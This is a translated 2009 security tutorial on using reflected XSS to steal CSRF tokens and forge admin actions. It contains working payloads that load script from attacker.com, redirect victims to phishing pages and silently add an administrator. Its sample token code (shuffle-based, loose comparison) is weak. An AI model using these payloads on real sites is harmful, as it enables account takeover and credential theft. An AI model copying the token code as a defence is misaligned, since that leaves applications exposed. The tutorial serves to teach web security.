Using XSS to bypass CSRF protection
Using XSS to bypass CSRF protection
<?php
// Autor: Nytro
// Contact: nytro_rst@yahoo.com
// Translated by: SENEQ_o
// Published on: 28 Octombrie 2009
// Romanian Security Team
?>
1) About XSS
2) About CSRF
3) Using XSS to bypass CSRF protection
Hello, in this tutorial I will teach you how to use XSSto bypass
CSRF protection. If you are familiar to XSS and CSRFterms you can skip the first two
chapters, but I recommend you read them.
Warning! This tutorial was written for educationalpurposes only ,and I take no
responsibility for your acts.
About XSS ( Cross Site Scripting )
XSS is probably the most common web vulnerability .Thisvulnerability, affects the
client , more precisely the user of the buggedapplication. It is not so dangerous , but it
can lead to many problems .Many websites have thisproblem , but they don’t have to
worry because there are little who use the exploit.
The main idea is simple .The web application receivesdata from the client , usually
from the GET function and then displays it .For example:
if(isset($_GET['text']))
{
$var = $_GET['text'];
print $var;
}
1
For a request such as:
http://www.site.com/script.php?text=test
what will be displayed is "test" . But what happens whensomebody makes the following
request:
http://www.site.com/script.php?text=<script>cod_javascript</script>
Well, the javascript code will be executed . Maybe you’rewondering: Why would
the attacker run the javascript code using GET ( whencould just type it in the browser:
javascript:code_javascript;). Well, the code is notdesigned for him. He can use the link:
http://www.site.com/script.php?text=<script>cod_javascript</script>
to send it to someone, to access it , and the javascriptcode will run on the victim’s
computer.
Most often, this problem is found in the search box ,regardless if the files are send
using POST, or send by GET , the return message will besomething like: "You searched
for ‘test’", but if the request is:
http://www.site.com/script.php?text=<script>cod_javascript</script>
the thing displayed will be: "You searched for ''" and the javascript codewill be ran.
But what can be done with that code, how harmful can itbe?
Well, there are plenty of things to do. For example, thepopularity behind XSS, is the
cookie stealing.
As you all know, having the cookies of a victim which islogged on an website, you
can use them to log yourself on that website using thevictim account. This can be easily
done using a cookie grabber.
A cookie grabber is a PHP file which receives data using GET( it can also receive
data using POST ) and writes it in a file on the attacker’s server.It is necessary that the
script runs on the bugged application, because if it runson other application,
document.cookie will not return the cookies we want. But thisis not what I planned to
2
cover in this tutorial, you will find plenty ofinformation about this.
XSS can be also used for phishing, for stealingauthentication information from
the victim, just as simple:
The attacker offers a link to the victim, such as:
http://www.site.com/script.php?text=<script>document.location.href=
"http://www.site-attacker.com/phishing.html"</script>
the victim is redirected to the phishing page(scam page),logs on the page , and the
attacker steals the private data. This can also be doneusing <iframe>. For example:
<iframe
src="http://attacker.com/phishing_page_identical_copy_of_the_aplication_page.h
tml" style="z-index: 0; position: absolute; top: 0;left: 0; height: 100%; width:
100%;"></iframe>
It is very easy, using CSS, we create an iframe whichcovers all the page.When the
user sees that the link is “ok”,he logs on.
The problem with this vulnerability is that the link is “ok”. So the
victim is possible no know if the is a problem or not. Ofcourse, she can figure it out from
the query, but it can be encrypted.
Usually, if you want to know if a website is vulnerable,you can use:
<script>alert(1)</script> or "><script>alert(1)</script>
Well, the are many possibilities depending on the browseryou use. You can find a
big list here: http://ha.ckers.org/xss.html
You can also use XSS to make "a page cooler", for fun. Forexample, visit
www.alonia.ro and in the search box type:
<script>document.images[4].src="http://rstcenter.com/up/director/RST.png"</script> .
There are many things that can be done. You will seelater, how to bypass CSRF
filters.
3
In order to get rid of this problem, you have to get ridof the <> characters.
To the PHP programmers I recommend htmlspecialcharsfunction
(or htmlentities ) with the second parameterENT_QUOTES.Both functions convert ">"
to ">" and "<" to "<" , and if you use it withthe second parameter ENT_QUOTES,
the function will transform in HTML entities even the (") and (').Thereby , for a request
such as:
http://site.com/script.php?text=<script>alert('1')</script>
in the source it will be displayed
<script>alert('1')</script>
but the text will be
<script>alert('1')</script>
and you will have no problems whatsoever. I alsorecommend using the second parameter
, because it can release you from many problems.
The code should look something like this:
if(isset($_GET['text']))
{
$var= $_GET['text'];
print htmlentities($var, ENT_QUOTES);
// Or print htmlspecialchars($var, ENT_QUOTES);
}
You may ask yourself if a XSS can be exploited , and ifthe data is send using
POST. The answer is yes and no. If the data is send usingPOST, the victim can not be
directly attacked , it can’t just click on the linkand that’s all, so we can say the XSS can’t be
exploited. But the victim can access an random page madeby the attacker , and that page
will send the malicious code using POST to the vulnerableWeb application page. For
example:
<form style="display: none;" method="post" action="http://www.alonia.ro/search">
<input type="hidden" name="searchStr" value="<script>alert(1)</script>"/>
4
<input name="send" type="submit" id="send" />
</form>
<script>
document.forms[0].send.click();
</script>
The idea is simple: we create an form as the one of thebugged application (make
sure the name of the fields are the same) and wepractically automate a search, we
practically put into effect that query, thereby sendingdata through POST, so the victim is
redirected towards our page, and the javascript code isexecuted.
About CSRF (Cross Site Request Forgery)
CSRF is a common vulnerability because little know aboutit. It effects
the client just as the XSS, more precisely, both XSS andCSRF target the users of Web
applications.
What makes this vulnerability possible is the automationof an action, this action
being made in general by the application administrators.For this type of vulnerability, the
victims are authenticated users of the application , andCSRF lets them automate some
actions that they can do.
For example , an administrator , in the administrationpanel , he has a page were
he can delete an article , just by clicking on a link.For example:
http://www.site.com/admin/delete_articol?articol_id=123
The attacker can make a page in which he can put thefollowing code:
<iframe
src="http://www.site.com/admin/delete_articol?articol_id=123"width="0"
height="0"></iframe>
When the victim ,in our case the administrator visitsthis webpage ,he will make a
request to
http://www.site.com/admin/delete_articol?articol_id=123
5
without knowing , and he will delete the article with hisdatabase id. Of course , the id can
be sent using POST, from an form , but the attacker cancopy that form and can send that
data using javascript:
document.forms[0].trimite.click();
This is the main idea. It is very easy for an applicationto be protected by this
problem, and we can enumerate some methods. The most usedmethod, and a very good
one, is using tokens, some strings which can be generatedrandomly and which are kept in
sessions, at the time we log in.
if(isset($_POST['login']))
{
// Check login
$_SESSTION['token'] = Random();
}
I use this function, it has some flaws, but it does whatI what it to do, and I can
specify what characters I want in the token and it’s length.
function Random()
{
$chars =
array('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','
Z','a
','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','0','1','2','3','4','5','
6','
7','8','9');
shuffle($chars);
$sir = substr(implode('', $chars), 0, 10);
return $sir;
}
We can use these tokens for verifying if a request istruly used by the person itself
and not by the CSRF.I should better give an example. Forexample, when deleting a file,
when we create the download link, we add this token:
print '<a href="admin.php?action=delete_articol&articol_id'. $date['id'] . '&token=' .
$_SESSION['token'] . '">Delete</a>';
6
Therefore, the link for the delete will be somethinglike:
http://www.site.com/admin.php?action=delete_articol&articol_id=123&to
ken=qdY4f6FTpO
All we need to verify before the action , in our case fordeleting the article ,is if the
token is equal to the one from the session:
if(isset($_GET['delete_articol']))
{
if($_SESSION['token'] == $_GET['token'])
{
// delete_specified_article();
}
else print 'The token does not match, you may be a victimon CSRF';
}
Thereby, the attacker will never know this token and hewill not be able to create a
valide link to delete the article. Other methods, saferbut more "time consuming" would be
to ask for users/administrator password for everyimportant action , or to add a
CAPTCHA image and verify the text entered by the user.
3) Using XSS for bypassing CSRF protection
Well, now we go to the important part, how to use XSS tobypass CSRF protection.
This technique applies to those websites, who have anapplication guarded by CSRF, and
another page which is vulnerable to XSS. Using that XSSwe can bypass the CSRF
protection and we can automate any action that anybodycan do on the application
without problems.
For example, one website has a little application on themain page which is
vulnerable to XSS, and a forum on /forum which is notvulnerable to CSRF. We will se
how we can use that XSS to bypass CSRF protection of theforum. As I said earlier, there
are many methods to prevent CSRF, but the most used isthat of tokens and hidden fields
(<input type="hidden" name="token" value="<?php print $_SESSION['token']; ?>" /> )
which are verified before the action is executed. We willtry to pass this type of protection,
so as we have time to do what we really want.
Lets start with the base idea, how to pass CSRFprotection, because we do not
7
know the that token. The solution is piece of cake, wefind it, and we can do this very
easily using javascript. Let’s take anexample, adding a new administrator depending on
the name of the user who will become administrator. Thiswill happen in the folder
/admin which is not vulnerable to CSRF:
/admin/admin.php?action=add_admin ( for example... ):
<form method="get" action="add_admin.php">
Name: <input type="text" name="name" value="" /><br />
<input type="hidden" name="token" value="<?php print $_SESSION['token']; ?>" />
<input type="submit" name="submit" value="add admin" /><br />
</form>
Well, this script adds an administrator. When the buttonis clicked the main
admin will make a request such as:
http://www.site.com/add_admin.php?name=Nytro&token=1htFI0iA9s&submit
When verifying,the token from the session will be thesame with the one send
from the form , and nitro will be an administrator.
<?php
session_start();
if(isset($_GET['submit']))
{
if($_SESSION['token'] == $_GET['token'])
{
// we_make_nytro_admin();
print 'Nytro is now an admin.';
}
else print 'Token invalid _|_ :)';
}
?>
Now let’s see what we can do to obtain thattoken. I will use as a method the GET
function, in examples, so as to be easier to understand,but you could apply as well the
POST function for data being sent.
8
We will consider on the main page (index.php), the vulnerableapplication which
contains the following code:
index.php:
<?php
if(isset($_GET['name']))
{
print 'Hello, ' . $_GET['name'];
}
?>
To simplify things, we won’t write our javascript codedirectly in the request ,
instead we will write it in a .js file which we willconsider uploaded on:
http://www.attacker.com/script.js
In request we will use:
http://www.site_vulnerabil.com/index.php?nume=<script
src="http://www.atacator.com/script.js"></script>
So lets see how we can find out the token usingjavascript. Very easy! We will use a
simple <iframe> in which we will open the page fromwhich the CSRF request is being
made (/admin/admin.php?action=add_admin)and we will read it. Thenwe will want the
link and we will redirect the victim (administrator)towards it,or we will write it in an
<iframe>.
Lets do it.
Firstly, from our javascript code we will have to createour iframe, which will open
the administration page. Will put everything in afunction which we will call at the onload
event of the iframe so as to be sure that the page loaded.
document.writeln('<iframe id="iframe" src="/admin/admin.php?action=add_admin"
width="0" height="0" οnlοad="read()"></iframe>');
9
Then we are going to write read() function which readsthe token, and displays it
in an alert.
function read()
{
alert(document.getElementById("iframe").contentDocument.forms[0].token.value);
}
Thereby, we are going to use a request such as:
http://www.vulnerable_website.com/index.php?name=<script
src="http://www.attacker.com/script.js"></script>
where
http://www.attacker.com/script.js
is:
document.writeln('<iframe id="iframe" src="/admin/admin.php?action=add_admin"
width="0" height="0" οnlοad="read()"></iframe>');
function read()
{
alert(document.getElementById("iframe").contentDocument.forms[0].token.value);
}
There should be an alert with the token we want. All wehave to do is to create an
link with that token and redirect the user towards it.Wewill modify the read() function
for this:
document.writeln('<iframe id="iframe" src="/admin/admin.php?action=add_admin"
width="0" height="0" οnlοad="read()"></iframe>');
function read()
{
var name = 'Nytro';
var token =
10
document.getElementById("iframe").contentDocument.forms[0].token.value;
document.location.href = 'http://127.0.0.1/admin/add_admin.php?name='+ name +
'&token=' + token + '&submit';
}
Thereby, if the victim makes a request to:
http://site_victim.com/index.php?name=<scriptsrc="http://127.0.0.1/script.js></script>
it will be redirected to:
http://site_victim.com/admin/add_admin.php?name=Nytro&token=aH52G7jtC3&sub
mit
for example, and Nytro will be admin. In order the victimnot to realize he was victim to
such an attack we put everything in the iframe
<iframe src='http://site_victim.com/index.php?name=<script
src="http://127.0.0.1/script.js"></script>'width="300" height="300"></iframe>
Well this was the base idea. Things can complicate a lot.We can use XSS to obtain
administrator rights on a vBulletin or phpBB forum , butthings are becoming
complicated, if we would need to send the data 2 timesusing POST we should use an
iframe in a iframe and so on,so is no use to make it complicated,but keep in mind that it
is possible. Also, usually the data will have to be sentusing POST.No problem! Just read
the token as we read it earlier and create an form as theone of the page protected by
CSRF.In our example , instead of redirecting we willmodify the our script this way:
document.writeln('<iframe id="iframe" src="/admin/admin.php?action=add_admin"
width="0" height="0" οnlοad="read()"></iframe>');
function read()
{
var name = 'Nytro';
var token =
document.getElementById("iframe").contentDocument.forms[0].token.value;
document.writeln('<form width="0" height="0" method="post"
action="/admin/add_admin.php">');
document.writeln('<input type="text" name="name" value="' + name + '" /><br />');
11
document.writeln('<input type="hidden" name="token" value="' + token + '" />');
document.writeln('<input type="submit" name="submit" value="Add_admin" /><br
/>');
document.writeln('</form>');
document.forms[0].submit.click();
}
Be careful at the forms, at actions and inputs from theforms. It is a little tricky
using POST but it is possible. Now you may want to tryputting on the iframe another
page such as http://www.google.ro , or another websiteand do the same. Well it no
possible because of the browser, it won’t letyou, you will get "Permission denied". It won’t
allow access through a frame ( or anything else) to apage from another server ,because on
security measures (taken by Netscape a long time ago: ‘datacontamination’ ) .
Maybe it is complicated to create links or generatingforms… Actually you can do
this much easier. Even though it won’t work onall browsers, contentDocument can be
read only, on Mozilla it is not. How can it be easier?Create an iframe with the page that is
protected by CSRF, write the wanted name in form an pressclick on submit button. So,
our script, it doesn’t matter if the data willbe sent by GET or by POST , it will look like
this:
document.writeln('<iframe id="iframe" src="/admin/admin.php?actiune=add_admin"
width="0" height="0" οnlοad="read()"></iframe>');
function read()
{
var name = 'Nytro';
document.getElementById("iframe").contentDocument.forms[0].name.value = name;
// write name
document.getElementById("iframe").contentDocument.forms[0].submit.click(); //
Press click
}
What can be easier then this?
This was all , I hope you understand , and I hope you don’t applywhat you learned
.I repeat :I wrote this tutorial for educational purposeonly. If you have questions,
suggestions or if you found flaws contact me.
12
Have a good day!
Nytro @ Romanian Security Team [ http://www.rstcenter.com/forum/ ]
13
http://packetstorm.codar.com.br/papers/attack/Using_XSS_to_bypass_CSRF_protection.pdf
Using XSS to bypass CSRF protection相关推荐
- Ambari删除服务报错之CSRF protection is turned on
Ambari安装组件失败后执行 curl 删除服务报错 CSRF protection is turned on X-Requested_By HTTP Header is required 解决方案 ...
- XSS攻击与CSRF攻击
XSS攻击 什么是XSS Cross-Site Scripting(跨站脚本攻击),简称XSS,是一种代码注入攻击.攻击者通过在目标网站上注入恶意脚本,使之在用户的浏览器上运行.利用这些恶意脚本,攻击 ...
- 存储型xss_web安全测试--XSS(跨站脚本)与CSRF
XSS攻击原理 反射型 发出请求时,xss代码出现在URL中,作为输入提交到服务器端,服务器端解析后响应,xss代码随响应内容一起传回浏览器,最后浏览器解析执行xss代码.这个过程像一次反射,故叫反射 ...
- xss攻击和csrf攻击
xss攻击:跨站脚本攻击 三种攻击方式:注入式攻击.反射型攻击.基于DOM的xss攻击 解决方式:过滤及转码:csp内容安全策略,通过头部或meta指定哪些脚本可以执行:httponly,只允许htt ...
- XSS攻击和CSRF攻击及其区别
XSS攻击 XSS(Cross Site Script,跨站脚本攻击)是向网页中注入恶意脚本在用户浏览网页时在用户浏览器中执行恶意脚本的攻击方式. 跨站脚本攻击分有两种形式: 反射型攻击(诱使用户点击 ...
- $html = %3c%3c%3cstr,浏览器安全 / Chrome XSS Auditor bypass
test: http://mhz.pw/game/xss/charset.php?xss=%3Cmeta%20charset=ISO-2022-JP%3E%3Csvg%20onload%1B%28B= ...
- XSS攻击和CSRF攻击(浅显易懂)
1.XSS攻击(跨站脚本攻击) 往web页面(包含HTML和js文件)嵌入可执行的代码(js) 为什么选择攻击js文件? 在网络传输的时候,js文件是可以被下载或者是通过Ajax提交的 js安全性比较 ...
- xss绕过字符过滤_IE8 xss filter bypass (xss过滤器绕过)
简要描述: IE 8 XSS 过滤器绕过.感谢@Sogili牛为本绕过通用性实现上提供的tricks. 详细说明: 1. 在IE8中,可以通过 <?import> + 的方式来构成一个XS ...
- WEB安全全基础漏洞学习
本文省略了SQL注入和xss漏洞,需要的可以网上找资料,资料非常多 web安全全基础漏洞学习 CSRF 简介 跨站请求伪造 (Cross-Site Request Forgery, CSRF),也被称 ...
最新文章
- 【怎样写代码】工厂三兄弟之抽象工厂模式(六):扩展案例II
- 项目中常用的 iOS 第三方库
- P1832 A+B Problem(再升级)
- html中鼠标左键自定义多级菜单,CSS多级菜单的实现代码
- .svc接口客户端调用_K8s:调用Java接口创建容器
- 月薪3k和30k的程序员,差距就在这道坎...
- rocketmq新扩容的broker没有tps_揭秘 RocketMQ 新特性以及在金融场景下的实践
- java异常练习:要求用户输入数字,捕获并处理用户输入错误的异常,给用户进行提示
- 为什么使用php工厂模式,PHP 工厂模式使用方法
- 【远距离无线模块】WDS3及SI4338使用步骤及配置说明
- ros重置后地址_初始化ROS路由器后,怎么使用Setup 指令配置IP地址?
- [博应用官网]iTunes备份密码忘记了该如何解决?
- c语言输入相应的成绩评定信息,C语言上机练习题记答案.doc
- 异硫氰酸荧光素标记磁性四氧化三铁纳米粒FITC-Hyd-PEG-Fe3O4|近红外染料CY7.5标记纳米二氧化硅CY7.5-SiO2 NPs
- python Beautiful Soup常用过滤方法
- 瑞萨单片机-硬件I2C从设备
- 微信怎样开通账户升级服务器,微信支付商户账户升级常见问题
- 担心PPT封面页不够出彩?这些例子你都知道吗?
- 群晖Video Station 电影/电视剧 海报和信息自动显示
- 最常见的Git错误都有哪些,如何解决它们?
热门文章
- c#轻松实现磁性窗口【原】
- 工作经历最详细的模板
- 【精】【PDF链接转图片】- Java用pdfbox将PDF的URL转换并压缩成图片,解决“口口口”乱码问题
- Python程序:任意输入一个三位数,然后把三位数的位置反转输出。
- 成套修炼,效果更佳---2007年的阅读计划
- outlook添加腾讯企业邮箱报错:无法访问此账户 可能需要更新密码或授予账户同步到此设备的权限
- linux中lv的详细创建流程【化分区-pv-vg-lv创建整套流程】,centos中lv脚本创建vg-pv-lv,-bash: lvs: command not found处理方法
- 数学建模比赛超全整理【数学建模有哪些比赛?】【全网最全数模整理】
- HTML5 新标签section使用
- 深度学习入门笔记(一):机器学习基础